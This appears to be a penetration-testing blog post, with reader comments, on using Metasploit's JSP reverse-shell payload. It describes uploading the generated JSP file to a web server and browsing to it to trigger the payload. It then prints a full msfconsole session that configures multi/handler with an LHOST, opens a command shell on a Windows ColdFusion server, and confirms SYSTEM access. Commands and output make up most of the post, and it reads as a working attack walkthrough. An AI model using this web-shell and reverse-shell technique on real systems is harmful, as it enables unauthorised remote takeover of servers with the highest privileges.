http://dev.metasploit.com/redmine/projects/framework/repository/show/modules/payloads/singles/java
I'm not sure of all the ways to use them but the easiest way is to just output the shell to raw and just upload it to a web server or for an example with an exploit check out the adobe robohelp exploit.
http://dev.metasploit.com/redmine/projects/framework/repository/entry/modules/exploits/windows/http/adobe_robohelper_authbypass.rb
yomomma@c0:~/pentest/msf3.
From there you can set up your multi handler, browse to your page webpath/blah.jsp and grab your shell.
yomomma@c0:~/pentest/msf3.
=[ msf v3.3-dev [core:3.3 api:1.0]
+ -- --=[ 432 exploits - 261 payloads
+ -- --=[ 21 encoders - 8 nops
=[ 222 aux
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD java/jsp_shell_reverse_tcp
set PAYLOAD java/jsp_shell_reverse_tcp
msf exploit(handler) > set LHOST 192.168.10.1
LHOST => 192.168.10.1
msf exploit(handler) > info
Name: Generic Payload Handler
Version: 6558
Platform: Windows, Linux, Solaris, Unix, OSX, BSD, PHP
Privileged: No
License: Metasploit Framework License (BSD)
Provided by:
hdm
Available targets:
Id Name
-- ----
0 Wildcard Target
Payload information:
Space: 100000
Avoid: 0 characters
Description:
This module is a stub that provides all of the features of the
Metasploit payload system to exploits that have been launched
outside of the framework.
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.10.1 yes The local address
LPORT 4444 yes The local port
SHELL cmd.exe yes The system shell to use.
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Starting the payload handler...
[*] Started reverse handler
[*] Command shell session 1 opened ( 192.168.10.1:4444 -> 192.168.10.2:42957)
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\ColdFusion8\runtime\bin>
whoami
nt authority\system
C:\ColdFusion8\runtime\bin>
exit
[*] Command shell session 1 closed.
Hi! I just have to say great work on thos blog!. This is the first time i got some problems, getting this to work, i start the payload and the multi handler. Upload the blah.jsp to my webserver. But when i try to connect with my "victim" machine to
ReplyDelete"webserver/blah.jsp" i only get the "download window" opened. or in Firefox i get the source code to the .jsp.
What am i doing wrong? should i make a (tag)cript language="javaScript"(tag)(blah.jsp) source code(tag)/script(tag)? or what? Keep up the good work, Peace
does the webserver know how to handle .jsp pages?
ReplyDelete